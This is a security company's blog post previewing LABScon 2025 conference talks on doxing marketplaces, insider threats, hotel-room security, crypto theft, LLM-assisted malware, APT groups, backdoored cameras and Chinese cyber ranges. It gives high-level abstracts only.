SIEM EMEA League

Back to the Menu Quick Jump

Endpoint Leagues

Live table for the Endpoint League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

Endpoint APJ League

Endpoint AMERICAS League

Endpoint EMEA League

Back to the Menu Quick Jump

A Global Competition, Built for the Community

This championship is proud to unite thousands of cybersecurity defenders in a showcase of skill, innovation, and strategy. We invite you to share this blog for live updates, engage with us on social media, help grow the buzz across our community, and watch as the stage for threat hunting glory gets bigger. Also, it’s not too late to make a run at Regionals. Enter the next qualifier and save your spot in the Sentinels League today!

Participation is open worldwide. Prize eligibility is subject to Terms & Conditions and some countries are not eligible to receive monetary rewards. See the full rules for details.

Back by popular demand, LABScon, the premier invite-only threat intelligence conference from SentinelLABS, returns for four days of immersive talks, hands-on workshops, and off-the-record sessions.

Now in its fourth year, LABScon brings together the world’s foremost cybersecurity minds to share cutting-edge research and advance collective understanding of the evolving threat landscape. Hosted in Scottsdale, Arizona, from September 17–20, this year’s event features an exceptional lineup of speakers and thought leaders.

A full schedule of the event is now available here. In this post, we put a spotlight on some of the most hotly-anticipated presentations we’ve got lined up for LABScon 2025. As with previous years, we’ll be releasing videos of some of the most popular talks in the weeks ahead, so bookmark the SentinelLABS home page, follow us on your favorite social media platform (LinkedIn, X, Bluesky), or sign up for the SentinelOne weekly email digest (eyes right →) to find out when the talks that catch your eye are publicly released.

Plunging the Internet Toilets: The Illicit Economy Enabling High-Tech Harassment, Stalking and Sextortion in the Stratosphere

SpyCloud Labs’ Trevor Hilligoss and Aurora Johnson bring us a deep dive into ‘internet toilets’: toxic online communities where netizens can dox their enemies and exes and collaborate with others to conduct aggressive cyberbullying and harassment campaigns. Focusing on Chinese online cesspools, Hilligoss and Johnson show how these Chinese internet toilets have strong similarities to western doxing communities and sadistic harm groups. More broadly, the presenters argue that digital gender-based-violence acts as a core motivator and monetary driver of cybercrime across the globe.

Internet toilet users often purchase data and technical services to enable targeted harassment and stalking. The speakers go over some of the tools and services marketed to doxers, stalkers, and harassers on Chinese darknet marketplaces across three main categories: personal data lookup services, which are often serviced by corrupt insiders with positions in public security and technology companies, digital harassment tools such as SMS bombardment services, and sexploitation tools like AI nudify apps.

Because some of this activity occurs on monetizable social media platforms, harassers and internet toilet admins can also get paid simply for making popular posts that get a lot of engagement. In many cases, this doxing and harassment escalates to physical violence and has even driven victims to suicide.

Honeypots and Hostile Takeovers: A Field Guide to Organizational Arbitrage

Not all compromises happen at the endpoint. While technical compromise is well understood, behavioral compromise enabled by social engineering, organizational dysfunction, and misaligned incentives remains a threat vector ripe for exploitation. Kristin Del Rosso (DEVSEC) walks through a methodological means of recognizing patterns that lead to cultivated insider threats, where actors exploit gaps in organizational visibility, policy exceptions, or social dynamics to gain influence, access, or placement.

Through anonymized case studies involving honeypotted executives, attempted hostile internal takeovers, and corporate espionage efforts, this talk dissects how subtle signals such as behavioral changes, relationship mapping, and broken enforcement norms can reveal growing security debt inside an organization. It will also show how technical instrumentation often misses this layer entirely unless designed with these dynamics in mind.

Kristin offers a practical framework for identifying organizational arbitrage, enforcing security culture, and separating malicious insiders from “move fast” employees, before a network compromise ever occurs.

How to Bug Hotel Rooms

Do you travel with expensive stuff? Do you like feeling safe about leaving your expensive stuff in your hotel room? Have you ever had anything stolen out of your room, or discovered someone has gained access to your room while you weren’t there? What about…other rooms? Maybe not EXACTLY a hotel room? Phobos Group’s Dan Tentler has presented on securing hotel rooms in the past, but now with Home Assistant, Z-Wave devices, Co2 sensors and mmWave radar, it’s become a whole new game.

In this talk, Dan shares his full travel security system. Using Home Assistant to automate things makes it incredibly easy to create rules to send alerts, turn lights on or off, make sounds, take pictures or anything else Home Assistant is capable of, but who knew it could be deployed tactically? Millimeter wave radar units can see through walls, which makes for a uniquely interesting development: like, who is lurking outside your room, or even in the room next door.

Dan’s presentation covers the basics of how all this equipment works, including a brief introduction to Home Assistant, deployment methodologies, how it can be used and future considerations – up to and including manufacturing and selling kits for deployment.

Your Apes May Be Gone, But the Hackers Made $9 Billion and They’re Still Here

Last year, crypto thefts hit $9.32 billion—more than half of all cybercrime losses. North Korea just pulled off a $1.5 billion heist from a single exchange. Meanwhile, most security professionals still think crypto is just magic internet money for buying NFT monkeys.

Andrew Macpherson’s talk is for the crypto-skeptical security professional who’s tired of hearing about “blockchain” and shows why crypto security is 90% the same Web2 skills you already have—phishing, social engineering, API abuse—just with irreversible consequences and way better attacker ROI.

Beginning with a practical crypto primer covering the essentials, the talks explains how blockchains work, what wallets actually do, and why stablecoins matter. Then, Andrew dives into the current threat landscape: who’s stealing what, how OFAC sanctions work in a pseudonymous world, and why traditional threat intel is failing miserably at tracking crypto crime.

Most importantly, the presentation shows what makes crypto security uniquely interesting: immutable code, irreversible transactions, and attackers’ monetary wins that can’t just be rolled or clawed back. Threat actors range from nation-states to teenage hackers, the attack surface spans everything from smart contract logic to social engineering, and the defensive tooling is still being invented.

Come for the massive heist stories, stay because you realize this is an unexplored frontier with its own unique problems. By the end, you’ll understand why crypto security attracts both sophisticated attackers and curious defenders—not for the hype, but because it’s a different kind of security challenge worth understanding.

LLM Malware In the Wild

Large language models (LLMs) are now part of mainstream software‑development workflows, but they have also become a powerful new tool for adversaries. Over the past year, the presenters wrote a multi‑provider YARA rule that hunts for hard‑coded OpenAI and Anthropic model credentials inside files uploaded to VirusTotal. The rule triggered on fully‑weaponised binaries and scripts that outsource key stages of the attack chain to commercial AI services.

In this talk, SentinelLABS’ Gabriel Bernadett-Shapiro and Alex Delamotte unpack what they found. The presentation walks through multiple malware families that embed real API keys and offload tasks such as phishing‑email generation, victim triage, code‑signing bypasses and on‑device payload generation to commercial LLMs.

Gabriel and Alex explore how LLM‑powered malware changes the defender’s problem space: static signatures fail because the malicious logic is produced only at run‑time; network inspection is harder because calls look identical to legitimate use; and prompt engineering itself becomes an adversarial discipline.

The Elephant in Many Rooms: Orange Indra’s Consistent Hunt for Access in the Asia Pacific Region

Within the ecosystem of espionage-oriented threat actors, there is often an unspoken hierarchy of intrusion sets; China-based, Russia-based, Iran-based, and North Korea-based threat actors are often regarded as being both tactically and strategically more relevant to Western organisations versus others.

In this talk, PwC’s Jono Davis shines a light on one of the less-discussed threat actors, introducing an intrusion set PwC assesses to be based in South Asia and have observed since at least 2024 conducting substantial credential phishing activity across the Asia Pacific region and beyond.

This is a threat actor PwC has dubbed Orange Indra (currently not aligned to any open-source nomenclature), responsible for campaigns targeting defence and government entities of countries that align with foreign policy objectives of the country it is based in.

In using Orange Indra as an example, Jono highlights the tools, techniques, and procedures (TTPs) of a prolific, efficient threat actor, alongside a strategic overview of the South Asia more broadly as it pertains to the wider Asia Pacific, and the potential near-future conflicts for regional hegemony.

Finally, this talk provides a platform to emphasise the strategic imperative for organisations, analysts, and the wider intelligence community to pay attention to threat actors emanating beyond the “Big 4” outlined above.

Are Your Chinese Cameras Spying For You or on You?

Hundreds of thousands, if not millions, of Chinese cameras, alarms and security systems have backdoors, and are designed to be ready to spy on you out of the box. Destined for the dumpster, most of these devices are designed to be unmaintainable.

Delivered by a sophisticated shadow supply chain that bypasses regulatory scrutiny supplying fake FCC, CE and UL certification, these devices are carefully laundered through online shopping platforms like Amazon and even high street shops.

In this talk, Silas Cutler (Censys) and Marc Rogers (nbhd.ai) present their analysis of the devices and current understanding of present backdoors. Additionally, this talk will cover past and ongoing efforts to hold transgressors accountable.

Auto-Poking The Bear – Analytical Tradecraft In The AI Age

Analytical tradecraft and shared standards have transformed Cyber Threat Intelligence from a niche discipline into a collaborative industry-wide research endeavor. Researchers and analysts now routinely build on each other’s work, creating a foundation of trust and shared methodology.

AI is disrupting this ecosystem, as we increasingly delegate data preparation, analysis, and entire workflows to AI assistants. Doing so will make us more productive, but not without cost. While you may trust your own AI-assisted analysis, can you trust another researcher’s prompts/agent process? As questions about reliability and transparency persist, we will need to adapt our research methodology and develop a new joint understanding of the promises, pitfalls, and probabilities inherent in AI-assisted work.

Dreadnode’s Martin Wendiggensen and Brad Palm tackle these challenges through a concrete case study, presenting their own LLM-based agentic system, developed to analyze Russian internet data leaked by Ukrainian cyber activists. The speakers walk through the system’s architecture and demonstrate its performance across tasks ranging from simple data collation to sophisticated analytical workflows to track adversaries.

Along the way, they outline how to understand the promises and limitations of this technology and more importantly, how to communicate them transparently to other researchers and audiences in order to maintain transparency and accountability for published products.

Hacktivism and War: Malicious Activism and Nation-State Fronts in Times of Conflict – A Clarifying Discussion

SentinelLABS’ own Jim Walter explores how malicious hacktivist activity is being strategically leveraged by nation-states and mercenary groups to obscure intent, destabilize targets, and weaponize public narratives. Through technical case studies and geopolitical analysis, Jim’s talk examines how these actors blend ransomware, data leaks, DDoS, and psychological operations under activist façades—creating significant challenges for attribution, response, and long-term threat modeling.

Combined with a review of existing and still highly-prolific traditional hacktivist groups and their role in the current landscape, this presentation offers to bring some much needed clarity to a very murky and confusing landscape.

Simulation Meets Reality: How China’s Cyber Ranges Fuel Cyber Operations

Between late 2024 and early 2025, the United States government issued indictments or sanctions against three Chinese information security firms – i-SOON, Sichuan Silence, and Integrity Tech – alleging their support for or links to malicious cyber groups targeting US government and critical infrastructure systems.

In their research, Mei Danowski (Natto Thoughts) and Eugenio Benincasa (ETH Zurich) found that all three companies serve as a key seedbed for nurturing China’s offensive cyber talent with cyber range services, which train cybersecurity professionals through “attack-defense live-fire” (攻防实战) exercises. Alongside hacking contests and crowdsourced bug bounty programs, attack-defense live-fire exercises are one of the primary mechanisms leveraged by the Chinese government to enhance its cyber capabilities, with support from a rapidly growing private cybersecurity industry with more than 4000 products and services providers.

This presentation focuses on the development of attack-defense exercises and commercial cyber ranges in China, areas that have received relatively little attention to date.

The talk examines how this ecosystem is shaping China’s offensive cyber capabilities and discusses 120 companies identified as providers of attack-defense exercises and cyber range services.

CamoFei Meets the Taliban

SentinelLABS’ Aleksandar Milenkoski and Insikt Group’s Julian-Ferdinand Vögele team up once again to bring you a unique talk on CamoFei, a threat actor that overlaps with ChamelGang (aka TAG-112, Evasive Panda), and which sets itself apart within the landscape of China-linked APT groups through a dual-track operational model that blends traditional cyber espionage with disruptive activities.

The group continues to target high-profile entities of strategic interest to Chinese intelligence, including Tibetan and Taiwanese organizations, while simultaneously engaging in operations that suggest influence or destabilization objectives, often layered with plausible deniability.

As of early 2025, CamoFei remains highly active, expanding its reach across a diverse set of governmental and private-sector targets in Southeast Asia, Europe, and the Middle East while adopting new tactics and techniques. Its recent compromise of Taliban networks in Afghanistan, which coincided with a suspected hack-and-leak influence campaign targeting the Taliban itself, points to a possible evolution toward hybrid operations that merge technical intrusions with geopolitical narratives.

While the shift remains unconfirmed, it reflects the broader challenge posed by the increasingly blurred lines between espionage, influence operations, and cybercrime, making attribution and intent analysis more difficult.

As multiple CamoFei victims exhibit signs of concurrent compromise by other Chinese-nexus groups, the case underscores a broader analytic challenge, namely, that overlapping intrusions within the same victim environments complicate attribution and intent analysis, raising important questions about coordination, operational autonomy, and competition within the broader Chinese threat ecosystem.